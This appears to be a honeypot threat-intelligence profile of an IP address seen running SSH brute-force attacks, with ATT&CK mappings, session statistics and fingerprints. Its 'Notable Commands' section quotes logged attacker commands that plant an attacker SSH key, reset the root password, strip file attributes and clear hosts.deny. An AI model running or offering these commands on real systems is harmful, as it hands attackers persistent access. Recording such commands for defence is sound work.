IntrusionLabs / threat intelligence

Sign in

← Back to feed

120.48.77.176

Threat Confidence

52%

Location

🇨🇳 CN / Beijing

ASN

AS38365 · Beijing Baidu Netcom Science and Technology Co., Ltd.

Cloud Provider

—

Total Events

102

Above average by volume

Agent Count

1

First / Last Seen

2026-04-14 05:45 — 2026-04-14 06:05

Attack Types

ssh:bruteforce

MITRE ATT&CK Techniques

Reconnaissance

T1595 T1595.002

Initial Access

T1078

Defense Evasion

T1070.004

Credential Access

T1110 T1110.001

Discovery

T1046 T1082 T1083

Command and Control

T1105

External Corroboration

Not flagged by any external feeds

Campaigns

Not associated with any campaigns

Session Forensics

scanner ×11 malware_dropper ×1 credential_probe ×3

Sessions

15 (1 with login)

Avg Depth Score

0.22

Commands Executed

20

Files Downloaded

2

Notable Commands

cd ~; chattr -ia .ssh; lockr -ia .ssh
lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cat /proc/cpuinfo | grep name | wc -l
echo "root:ghsZWvAT1MGV"|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls

Fingerprints

HASSH

03a80b21afa810682a776a7d42e5e6fb

SSH Client

SSH-2.0-libssh_0.11.1

Evidence Timeline

Scanner 140d0ddbb434 w4m_singapore_01 · 2026-04-14 06:01

15%

Loading events...

Scanner 11a1dcce3eba w4m_singapore_01 · 2026-04-14 06:03

15%

Loading events...

Scanner 983ace61f978 w4m_singapore_01 · 2026-04-14 06:01

15%

Loading events...

Scanner edd60e4a19fd w4m_singapore_01 · 2026-04-14 06:02

15%

Loading events...

Scanner 4592727aeb08 w4m_singapore_01 · 2026-04-14 06:00

15%

Loading events...

Scanner be35f5d069e3 w4m_singapore_01 · 2026-04-14 05:58

15%

Loading events...

Scanner 53059c5a1fe6 w4m_singapore_01 · 2026-04-14 05:58

15%

Loading events...

Credential Probe 688670f4d8c6 w4m_singapore_01 · 2026-04-14 05:59

1 20%

Loading events...

Scanner a72186167f8a w4m_singapore_01 · 2026-04-14 05:57

15%

Loading events...

Malware Dropper a6ae24d38770 w4m_singapore_01 · 2026-04-14 05:58

20 2 1 100%

Loading events...

Credential Probe 9e8e357751cd w4m_singapore_01 · 2026-04-14 05:58

1 20%

Loading events...

Scanner b253332af214 w4m_singapore_01 · 2026-04-14 05:56

15%

Loading events...

Credential Probe 7cde86a701f3 w4m_singapore_01 · 2026-04-14 05:56

1 20%

Loading events...

Scanner 113e837d58aa w4m_singapore_01 · 2026-04-14 05:50

15%

Loading events...

Scanner d5ecb61b8cd5 w4m_singapore_01 · 2026-04-14 05:45

15%

Loading events...